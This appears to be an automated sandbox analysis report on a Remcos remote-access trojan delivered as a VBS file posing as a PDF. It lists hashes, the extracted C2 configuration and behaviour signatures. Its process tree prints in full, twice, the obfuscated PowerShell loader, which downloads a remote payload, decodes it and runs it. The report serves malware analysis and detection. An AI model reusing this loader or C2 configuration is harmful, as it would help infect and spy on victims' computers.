Overview

overview

10

Static

static

1

1800001255...df.vbs

windows7-x64

10

1800001255...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 05:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    18000012550_20240930_0078864246·pdf.vbs

  • Size

    70KB

  • MD5

    89985981616f5fdef265814322d9735d

  • SHA1

    a7a505cea8373907fec133bf34d8d38e86e4dfb2

  • SHA256

    701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751

  • SHA512

    9129378a54842082be7097682acf92536c0fe2953d02ed8c27acd7d5e172c0c72b72993b9e4ce0ae208ee751187a66c0bd82771a40a4d6a63b052d7553d50eea

  • SSDEEP

    1536:sFfpwpBuWDXAU8M9CTszU4+fsEkbf11CLmVYf:sFfWSIA7MOfsEEfEf

Score
10/10
remcosremotehostdiscoveryrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\18000012550_20240930_0078864246·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2808
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2504
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2920

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    2d9881baa592d3c8af116bcb0ef58591

    SHA1

    25679773579844c67ba55e957522f27e1b82a739

    SHA256

    93b123e9be147e12f436a1b8927a77911036f95989971631c5c5a31922fc42ec

    SHA512

    184baead505c921140902e3949c8208e97d8dd4e34bd704b8d27a068a86be63ec495ebff324fb41e8d7ad1f9f4f0d368195080a0f0cb0bbed9d62a8b36baa1ca

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Forsvarsministers.Sca
    Filesize

    465KB

    MD5

    14b49dcb01461bfc4769023a403a5b1a

    SHA1

    c30a85bf569d584e918fe93be93494c76b119add

    SHA256

    1e8e511894d67dadb6441a4b9e9315d4f2ce396b89d6fc7631ee2ff5f103556b

    SHA512

    89089191d855f064b69a6b1499c25bdc0a5842e167dc17448bf18aa8aa4ec3abb7a852bdfbfc3acfba7c4240602536f52efcd31978d74e71a232e2f0ef21b42b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UMKLZQM15XAA30GCIDTC.temp
    Filesize

    7KB

    MD5

    4d8a844d75f2131840aead3740f4da79

    SHA1

    a6d648524df1e3f36910179f9aeb10fb4aec3864

    SHA256

    e548104eda720f2af6a1c834f0b5a1305fc9fe1ec6930981a758802c76d4bbfd

    SHA512

    791047567e6f2a091bfe50fc6bdda997dc14f293a27c16da0912b7db4f5493d2fe34007c9a5dba1782757b4860f4f1318d46009cbb7a705fdf4766262cd85489

    Download Submit

  • memory/2504-20-0x00000000062A0000-0x0000000009B66000-memory.dmp

    Filesize

    56.8MB

    Download

  • memory/2808-8-0x00000000024E0000-0x00000000024E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2808-9-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-10-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-11-0x000007FEF607E000-0x000007FEF607F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-12-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-14-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-16-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-4-0x000007FEF607E000-0x000007FEF607F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-7-0x000000001B1A0000-0x000000001B482000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2808-6-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2808-5-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2920-43-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download